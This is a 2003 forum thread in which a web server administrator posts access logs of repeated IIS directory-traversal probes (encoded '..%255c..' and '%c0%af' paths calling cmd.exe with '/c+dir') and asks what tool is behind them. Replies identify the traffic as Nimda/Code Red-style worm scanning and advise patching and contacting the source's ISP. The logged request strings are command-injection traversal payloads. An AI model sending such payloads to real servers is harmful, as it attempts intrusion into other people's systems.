Results 1 to 5 of 5

Thread: Whats he using... ?

  1. #1
    Junior Member
    Join Date
    Aug 2002
    Posts
    11

    Question Whats he using... ?

    For the past 17 hours, the same IP has been giving me the following log files on my web server:

    [04/Mar/2003:00:39:16 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 327 "-" "-"
    [04/Mar/2003:00:39:18 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
    [04/Mar/2003:00:39:19 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
    [04/Mar/2003:00:39:20 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
    [04/Mar/2003:00:39:20 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
    [04/Mar/2003:00:39:22 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 366 "-" "-"
    [04/Mar/2003:00:39:22 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 366 "-" "-"
    [04/Mar/2003:00:39:23 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "-" "-"
    [04/Mar/2003:00:39:24 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
    [04/Mar/2003:00:39:26 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
    [04/Mar/2003:00:39:26 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
    [04/Mar/2003:00:39:27 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
    [04/Mar/2003:00:39:28 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
    [04/Mar/2003:00:39:29 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
    [04/Mar/2003:00:39:30 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
    [04/Mar/2003:00:39:31 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"

    He is obviously using a "tool" to do this, seeing how rapid the requests are, and the fact that hes been doing it pretty consistently over the past 17 hours... do any of you know what program he is using? I would think the logs would be a pretty tell tale sign of what he was using...

    Also, if these attacks go on any longer, im going to want to take some kind of action against him. What steps would be plausable in this situation?

    Thanks,
    slick_shoes

  2. #2
    Senior Member
    Join Date
    Jun 2002
    Posts
    405
    Not completely sure, but this looks pretty much the same as another set of logs which have been posted just recently in another thread. You can find more information in the following threads:

    Apache Security Question
    hacked

  3. #3
    Senior Member
    Join Date
    Jan 2002
    Posts
    121
    Contact the person's ISP and give them the IP and the time table of the events. They'll choose their own course of action.
    what is love but contempt for hate?

  4. #4
    AO Ancient: Team Leader
    Join Date
    Oct 2002
    Posts
    5,197
    It's a pretty basic Nimca/code red automated thing..... See it all the time on my boxes.... If you are patched... which you appear to be by the 404 error codes in the log you have nothing to worry about......

    Complaining to the ISP will become a full time job..... If it's not a pain for you go ahead and send the logs..... But it will become a problem if you host web sites....
    Don\'t SYN us.... We\'ll SYN you.....
    \"A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools.\" - Thucydides

  5. #5
    Junior Member
    Join Date
    Aug 2002
    Posts
    11
    Thanks for the replies...
    Have a good day!

    slick_shoes

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •